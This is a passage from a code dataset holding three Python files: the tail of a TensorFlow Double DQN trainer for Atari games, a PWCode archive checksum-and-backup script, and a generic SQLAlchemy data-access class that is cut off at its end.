This will be explained in detail later.\n        # targetQ according to Bellman equation: \n        # Q = r + gamma*max Q', calculated in the function learn()\n        self.target_q = tf.placeholder(shape=[None], dtype=tf.float32)\n        # Action that was performed\n        self.action = tf.placeholder(shape=[None], dtype=tf.int32)\n        # Q value of the action that was performed\n        self.Q = tf.reduce_sum(tf.multiply(self.q_values, tf.one_hot(self.action, self.n_actions, dtype=tf.float32)), axis=1)\n        \n        # Parameter updates\n        self.loss = tf.reduce_mean(tf.losses.huber_loss(labels=self.target_q, predictions=self.Q))\n        self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n        self.update = self.optimizer.minimize(self.loss)\n\nclass ExplorationExploitationScheduler:\n    \"\"\"Determines an action according to an epsilon greedy strategy with annealing epsilon\"\"\"\n    def __init__(self, DQN, n_actions, replay_memory_start_size, max_steps,\n                 eps_initial=1, eps_final=0.1, eps_final_step=0.01, \n                 eps_evaluation=0.0, eps_annealing_steps=4000000):\n        \"\"\"\n        Args:\n            DQN: A DQN object\n            n_actions: Integer, number of possible actions\n            eps_initial: Float, Exploration probability for the first \n                replay_memory_start_size steps\n            eps_final: Float, Exploration probability after \n                replay_memory_start_size + eps_annealing_steps steps\n            eps_final_step: Float, Exploration probability after max_steps steps\n            eps_evaluation: Float, Exploration probability during evaluation\n            eps_annealing_steps: Int, Number of steps over which the \n                exploration probability is annealed from eps_initial to eps_final\n            replay_memory_start_size: Integer, Number of steps during \n                which the agent only explores\n            max_steps: Integer, Total number of steps shown to the agent\n        \"\"\"\n        self.n_actions = n_actions\n        self.eps_initial = eps_initial\n        self.eps_final = eps_final\n        self.eps_final_step = eps_final_step\n        self.eps_evaluation = eps_evaluation\n        self.eps_annealing_steps = eps_annealing_steps\n        self.replay_memory_start_size = replay_memory_start_size\n        self.max_steps = max_steps\n        \n        # Slopes and intercepts for exploration decrease\n        self.slope = -(self.eps_initial - self.eps_final)/self.eps_annealing_steps\n        self.intercept = self.eps_initial - self.slope*self.replay_memory_start_size\n        self.slope_2 = -(self.eps_final - self.eps_final_step)/(self.max_steps - self.eps_annealing_steps - self.replay_memory_start_size)\n        self.intercept_2 = self.eps_final_step - self.slope_2*self.max_steps\n        \n        self.DQN = DQN\n\n    def get_action(self, session, time_step, state, evaluation=False):\n        \"\"\"\n        Args:\n            session: A tensorflow session object\n            time_step: Integer, number of the current time_step\n            state: A (84, 84, 4) sequence of frames of an Atari game in grayscale\n            evaluation: A boolean saying whether the agent is being evaluated\n        Returns:\n            An integer between 0 and n_actions - 1 determining the action the agent performs next\n        \"\"\"\n        if evaluation:\n            eps = self.eps_evaluation\n        elif time_step < self.replay_memory_start_size:\n            eps = self.eps_initial\n        elif time_step >= self.replay_memory_start_size and time_step < self.replay_memory_start_size + self.eps_annealing_steps:\n            eps = self.slope*time_step + self.intercept\n        elif time_step >= self.replay_memory_start_size + self.eps_annealing_steps and time_step < self.max_steps:\n            eps = self.slope_2*time_step + self.intercept_2\n        else:\n            eps = self.eps_final_step\n\n        if random.random() < eps:\n            return random.randrange(0, self.n_actions)\n        return session.run(self.DQN.best_action, 
feed_dict={self.DQN.input:[state]})[0] \n\nclass ReplayMemory:\n    \"\"\"Replay Memory that stores the last size=1,000,000 transitions\"\"\"\n    def __init__(self, size, agent_history_length, batch_size, \n                 frame_height=84, frame_width=84):\n        \"\"\"\n        Args:\n            size: Integer, Number of stored transitions\n            frame_height: Integer, Height of a frame of an Atari game\n            frame_width: Integer, Width of a frame of an Atari game\n            agent_history_length: Integer, Number of frames stacked together to create a state\n            batch_size: Integer, Number of transitions returned in a minibatch\n        \"\"\"\n        self.size = size\n        self.frame_height = frame_height\n        self.frame_width = frame_width\n        self.agent_history_length = agent_history_length\n        self.batch_size = batch_size\n        self.count = 0\n        self.current = 0\n        \n        # Pre-allocate memory\n        self.actions = np.empty(self.size, dtype=np.int32)\n        self.rewards = np.empty(self.size, dtype=np.float32)\n        self.frames = np.empty((self.size, self.frame_height, self.frame_width), dtype=np.uint8)\n        self.terminal_flags = np.empty(self.size, dtype=np.bool_)\n        \n        # Pre-allocate memory for the states and new_states in a minibatch\n        self.states = np.empty((self.batch_size, self.agent_history_length, \n                                self.frame_height, self.frame_width), dtype=np.uint8)\n        self.new_states = np.empty((self.batch_size, self.agent_history_length, \n                                    self.frame_height, self.frame_width), dtype=np.uint8)\n        self.indices = np.empty(self.batch_size, dtype=np.int32)\n        \n    def add_experience(self, action, frame, reward, terminal):\n        \"\"\"\n        Args:\n            action: An integer between 0 and env.action_space.n - 1 \n                determining the action the agent performed\n            frame: A (84, 84) frame of an Atari game in grayscale\n            reward: A float determining the reward the agent received for performing an action\n            terminal: A bool stating whether the episode terminated\n        \"\"\"\n        if frame.shape != (self.frame_height, self.frame_width):\n            raise ValueError('Dimension of frame is wrong!')\n        self.actions[self.current] = action\n        self.frames[self.current, ...] 
= frame\n        self.rewards[self.current] = reward\n        self.terminal_flags[self.current] = terminal\n        self.count = max(self.count, self.current+1)\n        self.current = (self.current + 1) % self.size\n             \n    def _get_state(self, index):\n        if self.count == 0:\n            raise ValueError(\"The replay memory is empty!\")\n        if index < self.agent_history_length - 1:\n            raise ValueError(f'Index must be min {self.agent_history_length-1}')\n        return self.frames[index-self.agent_history_length+1:index+1, ...]\n        \n    def _get_valid_indices(self):\n        for i in range(self.batch_size):\n            while True:\n                index = random.randint(self.agent_history_length, self.count - 1)\n                if index < self.agent_history_length:\n                    continue\n                if index >= self.current and index - self.agent_history_length <= self.current:\n                    continue\n                if self.terminal_flags[index - self.agent_history_length:index].any():\n                    continue\n                break\n            self.indices[i] = index\n            \n    def get_minibatch(self):\n        \"\"\"\n        Returns a minibatch of self.batch_size = 32 transitions\n        \"\"\"\n        if self.count < self.agent_history_length:\n            raise ValueError('Not enough memories to get a minibatch')\n        \n        self._get_valid_indices()\n            \n        for i, idx in enumerate(self.indices):\n            self.states[i] = self._get_state(idx - 1)\n            self.new_states[i] = self._get_state(idx)\n        \n        return np.transpose(self.states, axes=(0, 2, 3, 1)), self.actions[self.indices], self.rewards[self.indices], np.transpose(self.new_states, axes=(0, 2, 3, 1)), self.terminal_flags[self.indices]\n    \n    def load_replay(self, path):\n        \"\"\"\n        Loads the Replay Memory State Variables from path\n        \"\"\"\n        try:\n            with open(os.path.join(path, 'replay_count.p'), 'rb') as f:\n                self.count = pickle.load(file=f)\n            with open(os.path.join(path, 'replay_current.p'), 'rb') as f:\n                self.current = pickle.load(file=f)\n            self.actions = np.load(os.path.join(path, 'replay_actions.npy'))\n            self.rewards = np.load(os.path.join(path, 'replay_rewards.npy'))\n            self.frames = np.load(os.path.join(path, 'replay_frames.npy'))\n            self.terminal_flags = np.load(os.path.join(path, 'replay_terminal_flags.npy'))\n        except Exception:\n            raise FileNotFoundError(\"Files for Replay Memory State do not exist\")\n\n    def save_replay(self, path):\n        \"\"\"\n        Saves the Replay Memory State Variables to path \n        \"\"\"\n        with open(os.path.join(path, 'replay_count.p'), 'wb') as f:\n            pickle.dump(self.count, file=f)\n        with open(os.path.join(path, 'replay_current.p'), 'wb') as f:\n            pickle.dump(self.current, file=f)\n        np.save(os.path.join(path, 'replay_actions.npy'), self.actions)\n        np.save(os.path.join(path, 'replay_rewards.npy'), self.rewards)\n        np.save(os.path.join(path, 'replay_frames.npy'), self.frames)\n        np.save(os.path.join(path, 'replay_terminal_flags.npy'), self.terminal_flags)\n\ndef learn(session, replay_memory, main_dqn, target_dqn, batch_size, gamma):\n    \"\"\"\n    Args:\n        session: A tensorflow session object\n        replay_memory: A ReplayMemory object\n        main_dqn: A DQN object\n        target_dqn: A DQN object\n        batch_size: Integer, Batch size\n        gamma: Float, discount factor for the Bellman equation\n    Returns:\n        loss: The loss of the minibatch, for tensorboard\n    Draws a minibatch from the replay memory, calculates the \n    target Q-value that the prediction Q-value is regressed to. \n    Then a parameter update is performed on the main DQN.\n    \"\"\"\n    # Draw a minibatch from the replay memory\n    states, actions, rewards, new_states, terminal_flags = replay_memory.get_minibatch()    \n    # The main network estimates which action is best (in the next \n    # state s', new_states is passed!) 
\n    # for every transition in the minibatch\n    arg_q_max = session.run(main_dqn.best_action, feed_dict={main_dqn.input:new_states})\n    # The target network estimates the Q-values (in the next state s', new_states is passed!) \n    # for every transition in the minibatch\n    q_vals = session.run(target_dqn.q_values, feed_dict={target_dqn.input:new_states})\n    double_q = q_vals[range(batch_size), arg_q_max]\n    # Bellman equation. Multiplication with (1-terminal_flags) makes sure that \n    # if the game is over, targetQ=rewards\n    target_q = rewards + (gamma*double_q * (1-terminal_flags))\n    # Gradient descent step to update the parameters of the main network\n    loss, _ = session.run([main_dqn.loss, main_dqn.update], \n                          feed_dict={main_dqn.input:states, \n                                     main_dqn.target_q:target_q, \n                                     main_dqn.action:actions})\n    return loss\n\nclass TargetNetworkUpdater:\n    \"\"\"Copies the parameters of the main DQN to the target DQN\"\"\"\n    def __init__(self, main_dqn_vars, target_dqn_vars):\n        \"\"\"\n        Args:\n            main_dqn_vars: A list of tensorflow variables belonging to the main DQN network\n            target_dqn_vars: A list of tensorflow variables belonging to the target DQN network\n        \"\"\"\n        self.main_dqn_vars = main_dqn_vars\n        self.target_dqn_vars = target_dqn_vars\n\n    def _update_target_vars(self):\n        update_ops = []\n        for i, var in enumerate(self.main_dqn_vars):\n            copy_op = self.target_dqn_vars[i].assign(var.value())\n            update_ops.append(copy_op)\n        return update_ops\n    \n    def __call__(self, sess):\n        \"\"\"\n        Args:\n            sess: A Tensorflow session object\n        Assigns the values of the parameters of the main network to the \n        parameters of the target network\n        \"\"\"\n        update_ops = self._update_target_vars()\n        for copy_op in update_ops:\n            sess.run(copy_op)\n\ndef generate_gif(frame_number, frames_for_gif, reward, path, prefix=\"TRAIN\"):\n    \"\"\"\n    Args:\n        frame_number: Integer, determining the number of the current frame\n        frames_for_gif: A sequence of (210, 160, 3) frames of an Atari game in RGB\n        reward: Integer, Total reward of the episode that is output as a gif\n        path: String, path where gif is saved\n    \"\"\"\n    for idx, frame_idx in enumerate(frames_for_gif): \n        frames_for_gif[idx] = resize(frame_idx, (420, 320, 3), \n                                     preserve_range=True, order=0).astype(np.uint8)\n        \n    imageio.mimsave(os.path.join(path, f'{prefix}_frame_{frame_number}_reward_{reward}.gif'), \n                    frames_for_gif, duration=1/30)\n\nclass Atari:\n    \"\"\"Wrapper for the environment provided by gym\"\"\"\n    def __init__(self, envName, no_op_steps, agent_history_length, frameskip):\n        self.env = gym.make(envName, frameskip=frameskip)\n        self.env.seed(0)\n        self.env.action_space.seed(0)\n        self.process_frame = FrameProcessor()\n        self.state = None\n        self.last_lives = 0\n        self.no_op_steps = no_op_steps\n        self.agent_history_length = agent_history_length\n        self.frameskip = frameskip\n\n    def reset(self, sess, evaluation=False):\n        \"\"\"\n        Args:\n            sess: A Tensorflow session object\n            evaluation: A boolean saying whether the agent is evaluating or training\n        Resets the environment and stacks four frames on top of each other to \n        create the first state\n        \"\"\"\n        frame = self.env.reset()\n        self.last_lives = 0\n        terminal_life_lost = True # Set to true so that the agent starts \n                                  # with a 'FIRE' action when evaluating\n        if evaluation:\n            for _ in range(random.randint(1, self.no_op_steps)):\n                frame, _, _, _ = self.env.step(1) # Action 'Fire'\n        processed_frame = self.process_frame(sess, frame)   # (★★★)\n        self.state = np.repeat(processed_frame, self.agent_history_length, axis=2)\n        \n        return 
terminal_life_lost\n\n    def step(self, sess, action):\n        \"\"\"\n        Args:\n            sess: A Tensorflow session object\n            action: Integer, action the agent performs\n        Performs an action and observes the reward and terminal state from the environment\n        \"\"\"\n        new_frame, reward, terminal, info = self.env.step(action)  # (5★)\n            \n        if info['ale.lives'] < self.last_lives:\n            terminal_life_lost = True\n        else:\n            terminal_life_lost = terminal\n        self.last_lives = info['ale.lives']\n        \n        processed_new_frame = self.process_frame(sess, new_frame)   # (6★)\n        new_state = np.append(self.state[:, :, 1:], processed_new_frame, axis=2) # (6★)   \n        self.state = new_state\n        \n        return processed_new_frame, reward, terminal, terminal_life_lost, new_frame\n\ndef clip_reward(reward):\n    return np.sign(reward)  \n\ndef set_seed(random_seed):\n    tf.set_random_seed(random_seed)\n    random.seed(random_seed)\n    np.random.seed(random_seed)\n\ndef train():\n    \"\"\"Contains the training and evaluation loops\"\"\"\n    SEED_PATH = os.path.join(PATH, 'seed_offset.txt')\n    if os.path.exists(SEED_PATH):\n        seed_arr = np.loadtxt(SEED_PATH)\n        if seed_arr != SEED_OFFSET:\n            raise ValueError(f'Training with an incorrect offset:{SEED_OFFSET} Correct Offset:{seed_arr}')\n    else:\n        with open(SEED_PATH, 'a') as f:\n            print(SEED_OFFSET, file=f)\n\n    if SAVE:\n        print(f'***Save option turned on: Files will be saved in {PATH}***')\n        print(\"***If you don't see the message 'All files saved' run cleaner.py***\")\n    my_replay_memory = ReplayMemory(size=MEMORY_SIZE, batch_size=BS, \\\n                                    agent_history_length=AGENT_HISTORY_LENGTH)\n    if LOAD:\n        my_replay_memory.load_replay(PATH)\n        print(\"Replay Memory Loaded\")\n    update_networks = TargetNetworkUpdater(MAIN_DQN_VARS, TARGET_DQN_VARS)\n    explore_exploit_sched = ExplorationExploitationScheduler(\n        MAIN_DQN, atari.env.action_space.n, \n        replay_memory_start_size=REPLAY_MEMORY_START_SIZE, \n        max_steps=MAX_STEPS)\n\n    reward_per_01 = os.path.join(PATH, 'rewards_every_episode.dat')\n    reward_per_10 = os.path.join(PATH, 'rewards_every_10_episodes.dat')\n    reward_eval_01= os.path.join(PATH, 'rewards_eval_every_episodes.dat')\n    reward_eval = os.path.join(PATH, 'rewards_eval.dat')\n\n    # with tf.Session(config=config) as sess:\n    with tf.Session() as sess:\n\n        time_step = 0\n        episode_number = 0\n        frame_number = 0\n        rewards = []\n\n        if LOAD:\n            ### Load the values\n            checkpoint_file = tf.train.latest_checkpoint(PATH)\n            loader = tf.train.import_meta_graph(checkpoint_file + '.meta')\n            loader.restore(sess, checkpoint_file)\n            with open(os.path.join(PATH, 'train_time_step.p'), 'rb') as f:\n                time_step = pickle.load(file=f)\n            with open(os.path.join(PATH, 'train_episode_number.p'), 'rb') as f:\n                episode_number = pickle.load(file=f)\n            with open(os.path.join(PATH, 'train_frame_number.p'), 'rb') as f:\n                frame_number = pickle.load(file=f)\n            with open(os.path.join(PATH, 'train_rewards.p'), 'rb') as f:\n                rewards = pickle.load(file=f)\n        else:\n            sess.run(init)\n        \n        if time_step >= TRAIN_STEPS:\n            raise ValueError(\"Agent already trained up to this time_step\")\n\n        while time_step < TRAIN_STEPS:\n            \n            ########################\n            ####### Training #######\n            ########################\n\n            epoch_steps = 0\n            while epoch_steps < EVAL_FREQUENCY:\n                set_seed(episode_number + SEED_OFFSET)\n                terminal_life_lost = atari.reset(sess)\n                episode_reward_sum = 0\n                episode_iter = 0\n                while episode_iter < MAX_EPISODE_LENGTH:\n                    episode_iter += FRAME_SKIP # (4★)\n                    action = explore_exploit_sched.get_action(sess, time_step, atari.state)   # (5★)\n                    processed_new_frame, reward, terminal, 
terminal_life_lost, _ = atari.step(sess, action)  \n                    time_step += FRAME_SKIP\n                    frame_number += 1\n                    epoch_steps += FRAME_SKIP\n                    episode_reward_sum += reward\n                    \n                    # Clip the reward\n                    clipped_reward = clip_reward(reward)\n                    \n                    # (7★) Store transition in the replay memory\n                    my_replay_memory.add_experience(action=action, \n                                                    frame=processed_new_frame[:, :, 0],\n                                                    reward=clipped_reward, \n                                                    terminal=terminal_life_lost)   \n                    \n                    ## Perform Gradient Descent\n                    if time_step % UPDATE_FREQ == 0 and time_step > REPLAY_MEMORY_START_SIZE:\n                        loss = learn(sess, my_replay_memory, MAIN_DQN, TARGET_DQN,\n                                     BS, gamma=DISCOUNT_FACTOR) # (8★)\n\n                    ## Update the Target Network\n                    if time_step % NETW_UPDATE_FREQ == 0 and time_step > REPLAY_MEMORY_START_SIZE:\n                        update_networks(sess) # (9★)\n                    \n                    ## Save the network parameters\n                    if SAVE and time_step % SAVE_FREQUENCY == 0:\n                        saver.save(sess, os.path.join(PATH, 'my_model'), global_step=time_step)\n                    if terminal:\n                        terminal = False\n                        break\n\n                episode_number += 1\n                rewards.append(episode_reward_sum)\n                \n                if SAVE:\n                    with open(reward_per_01, 'a') as f:\n                        print(time_step, frame_number, episode_number, episode_reward_sum, file = f)\n                \n                # Output the progress:\n                if len(rewards) % 10 == 0:\n                    print(len(rewards), time_step, np.mean(rewards[-100:]))\n                    if SAVE:\n                        with open(reward_per_10, 'a') as f:\n                            print(time_step, frame_number, episode_number,\n                                  np.mean(rewards[-10:]), file=f)\n            \n            ########################\n            ###### Evaluation ######\n            ########################\n            terminal = True\n            gif = True\n            frames_for_gif = []\n            eval_rewards = []\n            evaluate_frame_number = 0\n            \n            for _ in range(EVAL_STEPS):\n                if terminal:\n                    terminal_life_lost = atari.reset(sess, evaluation=True)\n                    episode_reward_sum = 0\n                    terminal = False\n           \n                # Fire (action 1), when a life was lost or the game just started, \n                # so that the agent does not stand around doing nothing. When playing \n                # with other environments, you might want to change this...\n                action = 1 if terminal_life_lost else explore_exploit_sched.get_action(sess, time_step,\n                                                                                       atari.state, \n                                                                                       evaluation=True)\n                \n                processed_new_frame, reward, terminal, terminal_life_lost, new_frame = atari.step(sess, action) ### A separate Atari\n                evaluate_frame_number += 1\n                episode_reward_sum += reward\n\n                if gif: \n                    frames_for_gif.append(new_frame)\n\n                if terminal:\n                    if SAVE:\n                        with open(reward_eval_01, 'a') as f:\n                            print(time_step, frame_number, episode_number, episode_reward_sum, file = f)\n                    gif = False # Save only the first game of the evaluation as a gif\n                    break\n                \n                ## Append the rewards\n                eval_rewards.append(episode_reward_sum)\n            print(\"Evaluation score:\\n\", np.mean(eval_rewards))   \n\n            if SAVE:\n                try:\n                    generate_gif(frame_number, frames_for_gif, eval_rewards[0], PATH)\n                except IndexError:\n                    print(\"No evaluation game finished\")\n            \n            frames_for_gif = []\n\n            if SAVE:\n                with open(reward_eval, 'a') as f:\n                    print(time_step, frame_number, episode_number, np.mean(eval_rewards), file=f)\n\n        print(f'Training Done till {time_step}')\n        if SAVE:\n            print(\"***Saving training parameters: In case you don't see 'Saved!' 
run the training procedure from start***\")\n            saver.save(sess, os.path.join(PATH, 'my_model'), global_step=time_step)\n            with open(os.path.join(PATH, 'train_time_step.p'), 'wb') as f:\n                pickle.dump(time_step, file=f)\n            with open(os.path.join(PATH, 'train_episode_number.p'), 'wb') as f:\n                pickle.dump(episode_number, file=f)\n            with open(os.path.join(PATH, 'train_frame_number.p'), 'wb') as f:\n                pickle.dump(frame_number, file=f)\n            with open(os.path.join(PATH, 'train_rewards.p'), 'wb') as f:\n                pickle.dump(rewards, file=f)\n        if SAVE:\n            my_replay_memory.save_replay(PATH)\n            print(\"***Saved!***\")\n            print(\"All files saved\")\n\ndef eval_model(frameskip, gif_path, time_step, meta_graph_path, checkpoint_path):\n    '''\n    frameskip: frameskip parameter\n    meta_graph_path: path to meta-file (e.g.: '/home/DQN/Enduro-20/run_1/my_model-30000000.meta')\n    checkpoint_path: path to checkpoint-file (e.g.: '/home/DQN/Enduro-20/run_1/my_model-30000000')  \n    '''\n    os.makedirs(gif_path, exist_ok=True)\n\n    explore_exploit_sched = ExplorationExploitationScheduler(\n        MAIN_DQN, atari.env.action_space.n, \n        replay_memory_start_size=REPLAY_MEMORY_START_SIZE, \n        max_steps=MAX_STEPS)\n\n    # with tf.Session(config=config) as sess:  \n    with tf.Session() as sess:\n\n        ### Restore Model\n        saver = tf.train.import_meta_graph(meta_graph_path)\n        saver.restore(sess, checkpoint_path)\n\n        frames_for_gif = []\n        terminal_life_lost = atari.reset(sess, evaluation = True)\n        episode_reward_sum = 0\n        while len(frames_for_gif) < EVAL_STEPS:\n            # atari.env.render()\n            action = 1 if terminal_life_lost else explore_exploit_sched.get_action(sess, 0, atari.state, \n                                                                                   evaluation = True)\n            \n            processed_new_frame, reward, terminal, terminal_life_lost, new_frame = atari.step(sess, action)\n            episode_reward_sum += reward\n            frames_for_gif.append(new_frame)\n            if terminal:\n                break\n        \n        # atari.env.close()\n        print(f'The total reward for timestep {time_step} is {episode_reward_sum}')\n\n        if SAVE:\n            print(\"Creating gif...\")\n            generate_gif(time_step, frames_for_gif, episode_reward_sum, gif_path, prefix=\"EVAL\")\n            print(f'Gif created, check the folder {gif_path}/{GAME}_{FRAME_SKIP}_{time_step}')\n        return episode_reward_sum\n\nif __name__ == '__main__':\n    # Setup Parser\n    parser = argparse.ArgumentParser(formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument(\"--game\", default=\"Pong\", help=\"Name of Atari Game\")\n    parser.add_argument(\"--version\", default=4, type=int, help=\"Version\")\n    parser.add_argument(\"--frameskip\", default=1, type=int, help=\"frameskip value\")\n\n    parser.add_argument(\"--train\", action='store_true', help='Train vs Evaluate')\n    parser.add_argument(\"--save\", action='store_true', help='Save Models and Results')\n    parser.add_argument(\"--save_frequency\", type=int, default=100000, help=\"Save Frequency\")\n    parser.add_argument(\"--load\", action='store_true', help=\"Load Model in last RUN in PATH\")\n\n    parser.add_argument(\"--eval_steps\", type = int, help=\"Number of evaluation steps\")\n    parser.add_argument(\"--netw_update_freq\", type = int, help=\"Frequency of updating the target network\")\n    parser.add_argument(\"--update_freq\", type = int, help=\"Number of actions before gradient descent\")\n    parser.add_argument(\"--memory_size\", type = int, default=1000000, help=\"Size of replay memory: Default 1 million\")\n    parser.add_argument(\"--max_steps\", type = int, default=100000000, help=\"Total number of frames an agent sees\")\n    parser.add_argument(\"--train_steps\", type = int, default = 50000000, 
help=\"Trained upto TRAIN_STEPS\")\n parser.add_argument(\"--gamma\", type = float, default = 0.99, help = \"Discount Factor\")\n parser.add_argument(\"--offset\", type=int, default = 0, help=\"Offset of seed to train the model on\")\n parser.add_argument(\"--time_step\", type = int, help=\"TIME_STEP corresponding to evaluation of model\")\n parser.add_argument(\"--run_id\", type=int, help=\"RUN to be trained\")\n parser.add_argument(\"--path\", help=\"Path to store models and values: PATH/'GAME'-'FRAMESKIP'/GAMMA-'GAMMA'/run_'RUN_ID'/\")\n parser.add_argument(\"--seed\", type=int, default=0, help=\"Random seed to evaluate model on\")\n \n args = parser.parse_args()\n tf.reset_default_graph()\n RANDOM_SEED = args.seed\n\n GAME = args.game\n ENV_NAME = f'{args.game}Deterministic-v{args.version}'\n FRAME_SKIP = args.frameskip\n \n TRAIN = args.train\n SAVE = args.save\n SAVE_FREQUENCY = args.save_frequency\n LOAD = args.load\n atari = Atari(ENV_NAME, no_op_steps=NO_OP_STEPS, agent_history_length=AGENT_HISTORY_LENGTH, \\\n frameskip=FRAME_SKIP)\n \n # main DQN and target DQN networks:\n with tf.variable_scope('mainDQN'):\n MAIN_DQN = DQN(atari.env.action_space.n, HIDDEN, LEARNING_RATE, agent_history_length=AGENT_HISTORY_LENGTH)\n with tf.variable_scope('targetDQN'):\n TARGET_DQN = DQN(atari.env.action_space.n, HIDDEN, TARGET_LEARNING_RATE, agent_history_length=AGENT_HISTORY_LENGTH)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver(max_to_keep=100000) \n\n MAIN_DQN_VARS = tf.trainable_variables(scope='mainDQN')\n TARGET_DQN_VARS = tf.trainable_variables(scope='targetDQN')\n\n # update frequencies of the target and main networks\n if args.netw_update_freq:\n NETW_UPDATE_FREQ = args.netw_update_freq\n elif FRAME_SKIP<=4:\n NETW_UPDATE_FREQ = 10000*FRAME_SKIP\n else:\n NETW_UPDATE_FREQ = 5000*FRAME_SKIP\n \n if args.update_freq:\n UPDATE_FREQ = args.update_freq\n else:\n UPDATE_FREQ = max(FRAME_SKIP, 16)\n \n if args.eval_steps:\n EVAL_STEPS = args.eval_steps\n else:\n EVAL_STEPS = int(MAX_EPISODE_LENGTH/FRAME_SKIP)\n\n MEMORY_SIZE = args.memory_size\n MAX_STEPS = args.max_steps\n TRAIN_STEPS = args.train_steps\n DISCOUNT_FACTOR = args.gamma\n SEED_OFFSET = args.offset\n\n if TRAIN:\n print(\"***TRAINING***\")\n ### Need to save and load the model\n if args.path:\n PATH = os.path.join(args.path, f'{GAME}-{FRAME_SKIP}/GAMMA-{DISCOUNT_FACTOR}')\n else:\n PATH = f'/content/drive/MyDrive/DQN-Train/{GAME}-{FRAME_SKIP}/GAMMA-{DISCOUNT_FACTOR}' \n ### Fetch RUNID\n if args.run_id:\n RUNID = args.run_id\n else:\n RUNID = 1\n while os.path.exists(os.path.join(PATH, 'run_' + str(RUNID))):\n RUNID += 1\n \n if LOAD:\n RUNID -= 1\n\n PATH = os.path.join(PATH, 'run_' + str(RUNID))\n if TRAIN or LOAD:\n os.makedirs(PATH, exist_ok=True)\n\n print(f'The env {ENV_NAME} has the following {atari.env.action_space.n} \\\n actions: {atari.env.unwrapped.get_action_meanings()}')\n train()\n \n elif args.time_step:\n print(f'Proceeding with Evaluation of Model with time step {args.time_step}')\n META_PATH = os.path.join(args.path, f'my_model-{args.time_step}.meta')\n CHECKPOINT = os.path.join(args.path, f'my_model-{args.time_step}')\n eval_model(FRAME_SKIP, args.path, args.time_step, META_PATH, CHECKPOINT)\n\n else:\n raise ValueError(\"Folder Evaluation Not Yet Implemented\")","sub_path":"dqn-trainer-colab.py","file_name":"dqn-trainer-colab.py","file_ext":"py","file_size_in_byte":39608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"637720891","text":"import os\nfrom pathlib import Path\nfrom configparser import ConfigParser\nfrom common.config import add_config_section\nfrom common.file import md5sum, copy_file_progress\nfrom process_data_defs import (\n mount_wim,\n process,\n)\n\n\"\"\" SYSTEM \"\"\"\nSYSTEM_DIR = '/home/bba/bin/PWCode/projects/test' # Dir with wim- or tar archive and pwcode.ini\n\n\ndef main():\n config_dir = os.environ[\"pwcode_config_dir\"] # Get PWCode config path\n tmp_dir = config_dir + '/tmp'\n os.chdir(tmp_dir) # Avoid littering from subprocesses\n config = ConfigParser()\n config_file = SYSTEM_DIR + \"/pwcode.ini\"\n\n if os.path.isdir(SYSTEM_DIR) and os.path.isfile(config_file):\n config.read(config_file)\n checksum = config.get('SYSTEM', 'checksum')\n checksum_verified = config.get('SYSTEM', 'checksum_verified')\n archive_format = config.get('SYSTEM', 'archive_format')\n\n system_name = os.path.basename(SYSTEM_DIR)\n archive_path = SYSTEM_DIR + '/' + system_name + '.' + archive_format\n archive_bak_path = SYSTEM_DIR + '/bak/' + system_name + '.' + archive_format\n mount_dir = SYSTEM_DIR + '/mount'\n bak_dir = SYSTEM_DIR + '/bak'\n\n for dir in [mount_dir, bak_dir]:\n Path(dir).mkdir(parents=True, exist_ok=True)\n\n if not checksum:\n return \"No checksum in 'pwcode.ini'. Exiting.\"\n\n if not os.path.isfile(archive_path):\n return \"'\" + archive_path + \"' is not a valid archive path. Exiting.\"\n\n if not eval(checksum_verified):\n if checksum == md5sum(archive_path):\n print(\"Data verified by checksum.\")\n config.set('SYSTEM', 'checksum_verified', \"True\")\n\n with open(config_file, \"w+\") as f:\n config.write(f, space_around_delimiters=False)\n else:\n return \"Checksum Mismatch. Check data integrity. Exiting.\"\n\n if not os.path.isfile(archive_bak_path):\n print(\"\\nBackup archive before processing...\")\n copy_file_progress(archive_path, archive_bak_path, prefix='Backup archive:', suffix='done', decimals=0, length=50)\n print(\"\\nBackup complete.\")\n\n process(mount_dir, archive_format, archive_path)\n\n else:\n return \"'\" + SYSTEM_DIR + \"' is not a valid path. Exiting.\"\n\n # return 'All data processed.' 
# WAIT: Not always printed -> why?\n\n\nif __name__ == '__main__':\n    msg = main()\n    print(msg)\n\n","sub_path":"config/sidepanel/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"503656672","text":"from sqlalchemy.exc import SQLAlchemyError\nfrom commons.get_connexion import DataProvider as dataProvider\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n\n\nclass GenericDao(object):\n    def __init__(self, table_name, entity_type):\n        self.table_name = table_name\n        self.entity_type = entity_type\n        self.dataProvider = dataProvider()\n        self.table = Table(table_name, self.dataProvider.metadata, autoload=True)\n        self.table_mapper = mapper(entity_type, self.table)\n\n    def get_connexion(self):\n        return self.dataProvider.session\n\n    def close_connexion(self, session):\n        if session is not None:\n            try:\n                session.close()\n            except SQLAlchemyError as e:\n                raise (e)\n\n    def do_select_all(self):\n        try:\n            session = self.get_connexion()\n        except SQLAlchemyError as e:\n            raise (e)\n        return session.query(self.entity_type).all()\n\n    def do_select(self, query):\n        try:\n            session = self.get_connexion()\n            entity = session.query(self.entity_type).filter(query).first()\n        except SQLAlchemyError as e:\n            raise (e)\n        return entity\n\n    def do_insert(self, entity):\n        session = None\n        try:\n            session = self.get_connexion()\n            session.add(entity)\n            session.commit()\n            return entity\n        except SQLAlchemyError as e:\n            session.rollback()\n            raise (e)\n\n    def do_update(self, entity, query):\n        try:\n            session = self.get_connexion()\n            result = session.query(self.entity_type).filter(query).update(entity.to_dict())\n            session.commit()\n        except SQLAlchemyError as e:\n            session.rollback()\n            raise (e)\n        return result\n\n    def do_exist(self, query):\n        try:\n            session = self.get_connexion()\n            result = session.query(self.entity_type).filter(query).exists()\n        except SQLAlchemyError as e:\n            raise (e)\n        return result\n\n    def do_count_all(self):\n        try:\n            session = self.get_connexion()\n            result = session.query(self.entity_type).count()\n        except SQLAlchemyError as e:\n            session.rollback()\n            raise (e)\n        return result\n\n    def do_delete(self, query):\n        try:\n            session = self.get_connexion()\n            result = session.query(self.entity_type).filter(query).delete()\n            session.commit()\n        except SQLAlchemyError as e:\n            raise (e)\n        return 